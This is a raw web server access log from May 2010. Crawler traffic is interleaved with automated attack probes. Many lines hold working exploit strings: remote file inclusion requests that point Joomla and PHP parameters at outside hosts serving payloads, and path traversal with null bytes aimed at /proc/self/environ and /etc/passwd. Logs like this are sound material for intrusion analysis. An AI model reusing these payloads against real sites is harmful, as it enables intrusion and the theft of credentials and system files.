77.222.56.62 - - [27/May/2010:19:04:10 -0500] "GET /errors.php?error=http://rxnzm.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [27/May/2010:19:04:12 -0500] "GET //errors.php?error=http://rxnzm.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
217.65.100.75 - - [27/May/2010:19:05:12 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.ovohely.hu/assets/images/autogen/ts?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
87.250.255.243 - - [27/May/2010:19:06:33 -0500] "GET /logs/access_log.1225929600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.241.176.6 - - [27/May/2010:19:10:23 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [27/May/2010:19:10:23 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
38.101.148.126 - - [27/May/2010:19:11:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [27/May/2010:19:11:15 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
69.175.61.50 - - [27/May/2010:19:19:08 -0500] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://saskatchewan.localjobshop.ca/media/id1?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.61.50 - - [27/May/2010:19:19:08 -0500] "GET /logs/access_log.1271635200/contrib/mx_glance_sdesc.php?mx_root_path=http://saskatchewan.localjobshop.ca/media/id1?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.61.50 - - [27/May/2010:19:19:08 -0500] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://saskatchewan.localjobshop.ca/media/id1?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.61.50 - - [27/May/2010:19:19:08 -0500] "GET /logs/access_log.1272153600/contrib/mx_glance_sdesc.php?mx_root_path=http://saskatchewan.localjobshop.ca/media/id1?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.46.13.51 - - [27/May/2010:19:20:29 -0500] "GET /logs/access_log.1166227200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.222.56.62 - - [27/May/2010:19:20:31 -0500] "GET /logs//errors.php?error=http://rxnzm.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [27/May/2010:19:20:41 -0500] "GET /logs/access_log.1268092800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [27/May/2010:19:21:30 -0500] "GET /logs/access_log.1202774400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.133.201.194 - - [27/May/2010:19:21:50 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.133.201.194 - - [27/May/2010:19:21:50 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.199.47 - - [27/May/2010:19:25:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.47 - - [27/May/2010:19:25:29 -0500] "GET /logs/ HTTP/1.1" 200 7289 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.44.120.2 - - [27/May/2010:19:28:03 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.2 - - [27/May/2010:19:28:03 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [27/May/2010:19:30:08 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [27/May/2010:19:33:45 -0500] "GET /logs/access_log.1274313600//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [27/May/2010:19:33:45 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [27/May/2010:19:33:45 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [27/May/2010:19:35:25 -0500] "GET /logs/access_log.1269993600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.122.52.80 - - [27/May/2010:19:42:58 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:19:42:58 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:19:43:02 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:19:43:02 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:19:43:05 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:19:43:05 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:19:43:05 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:19:43:07 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:19:43:11 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
207.46.194.93 - - [27/May/2010:19:45:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.93 - - [27/May/2010:19:45:12 -0500] "GET /artwork/tommy-cofin.png HTTP/1.1" 200 52201 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
213.251.189.205 - - [27/May/2010:19:47:42 -0500] "GET /logs/access_log.1271635200//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:42 -0500] "GET /logs/access_log.1270857600//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:42 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 7294 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:42 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:43 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:43 -0500] "GET /logs/access_log.1270857600//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:43 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 7294 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:43 -0500] "GET /logs/access_log.1271635200//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:50 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:50 -0500] "GET /logs/access_log.1262390400//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:47:50 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 7294 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:48:05 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:48:06 -0500] "GET /logs/access_log.1270857600//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:48:06 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 7294 "-""Mozilla/5.0"
213.251.189.205 - - [27/May/2010:19:48:06 -0500] "GET /logs/access_log.1271635200//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
76.73.80.242 - - [27/May/2010:19:48:09 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:48:09 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:48:10 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:48:10 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
87.250.255.243 - - [27/May/2010:19:48:21 -0500] "GET /logs/access_log.1266796800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.162.206.179 - - [27/May/2010:19:48:40 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
125.162.206.179 - - [27/May/2010:19:48:46 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
76.73.80.242 - - [27/May/2010:19:48:52 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:48:52 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:53:29 -0500] "GET /logs/access_log.1274227200//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:53:29 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:53:30 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.834"
174.133.201.194 - - [27/May/2010:19:53:31 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [27/May/2010:19:53:32 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:53:33 -0500] "GET /logs/access_log.1274227200//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:53:33 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
76.73.80.242 - - [27/May/2010:19:53:37 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.834"
87.250.255.243 - - [27/May/2010:20:00:41 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
75.125.131.10 - - [27/May/2010:20:15:31 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
199.231.58.31 - - [27/May/2010:20:15:32 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
75.125.131.10 - - [27/May/2010:20:15:32 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
199.231.58.31 - - [27/May/2010:20:16:08 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
199.231.58.31 - - [27/May/2010:20:16:08 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
199.231.58.31 - - [27/May/2010:20:16:08 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
75.125.131.10 - - [27/May/2010:20:16:08 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:16:08 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:16:09 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:16:12 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:16:12 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:16:12 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
87.250.255.243 - - [27/May/2010:20:16:18 -0500] "GET /logs/access_log.1223251200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.43 - - [27/May/2010:20:16:29 -0500] "GET /logs/access_log.1157155200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.125.131.10 - - [27/May/2010:20:17:34 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:17:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
199.231.58.31 - - [27/May/2010:20:17:34 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
199.231.58.31 - - [27/May/2010:20:17:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.100.59.16 - - [27/May/2010:20:17:34 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.100.59.16 - - [27/May/2010:20:17:34 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.100.59.16 - - [27/May/2010:20:17:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.100.59.16 - - [27/May/2010:20:17:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
199.231.58.31 - - [27/May/2010:20:18:35 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
75.125.131.10 - - [27/May/2010:20:18:40 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:18:43 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
199.231.58.31 - - [27/May/2010:20:20:36 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
199.231.58.31 - - [27/May/2010:20:20:37 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.121.217.37 - - [27/May/2010:20:20:55 -0500] "GET /logs/access_log.1262649600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://talkpic.com/bbs/icon/private_name/id/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.217.37 - - [27/May/2010:20:20:55 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://talkpic.com/bbs/icon/private_name/id/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.121.217.37 - - [27/May/2010:20:20:55 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://talkpic.com/bbs/icon/private_name/id/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.249.71.144 - - [27/May/2010:20:21:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.144 - - [27/May/2010:20:21:44 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.133.201.194 - - [27/May/2010:20:24:16 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [27/May/2010:20:24:16 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.137.176.68 - - [27/May/2010:20:29:37 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://talkpic.com/bbs/icon/private_name/id/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.137.176.68 - - [27/May/2010:20:29:37 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://talkpic.com/bbs/icon/private_name/id/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.137.176.68 - - [27/May/2010:20:29:37 -0500] "GET /logs/access_log.1262649600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://talkpic.com/bbs/icon/private_name/id/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [27/May/2010:20:29:43 -0500] "GET /logs/access_log.1210896000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
119.63.193.56 - - [27/May/2010:20:30:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
204.93.174.47 - - [27/May/2010:20:32:00 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
204.93.174.47 - - [27/May/2010:20:32:00 -0500] "GET /logs/access_log.1271548800//bookmark4u/lostpasswd.php?env[include_prefix]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
204.93.174.47 - - [27/May/2010:20:32:01 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.44.120.2 - - [27/May/2010:20:32:30 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [27/May/2010:20:32:30 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.44.120.3 - - [27/May/2010:20:35:25 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.3 - - [27/May/2010:20:35:25 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.13.86 - - [27/May/2010:20:35:29 -0500] "GET /logs/access_log.1178236800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [27/May/2010:20:38:25 -0500] "GET /logs/access_log.1212969600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.174.62.150 - - [27/May/2010:20:42:14 -0500] "GET /logs/access_log.1271548800//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:20:42:14 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:20:42:14 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
87.250.255.243 - - [27/May/2010:20:43:12 -0500] "GET /logs/access_log.1250121600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.189 - - [27/May/2010:20:46:27 -0500] "GET /logs/access_log.1212710400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.240 - - [27/May/2010:20:46:59 -0500] "GET /logs/access_log.1186531200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.201.194 - - [27/May/2010:20:47:55 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [27/May/2010:20:47:55 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:48:06 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:48:06 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:48:06 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:20:48:06 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
199.231.58.31 - - [27/May/2010:20:48:06 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
199.231.58.31 - - [27/May/2010:20:48:07 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.46.13.98 - - [27/May/2010:20:48:29 -0500] "GET /logs/access_log.1215388800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.100.59.16 - - [27/May/2010:20:48:35 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.100.59.16 - - [27/May/2010:20:48:35 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.100.59.16 - - [27/May/2010:20:48:36 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
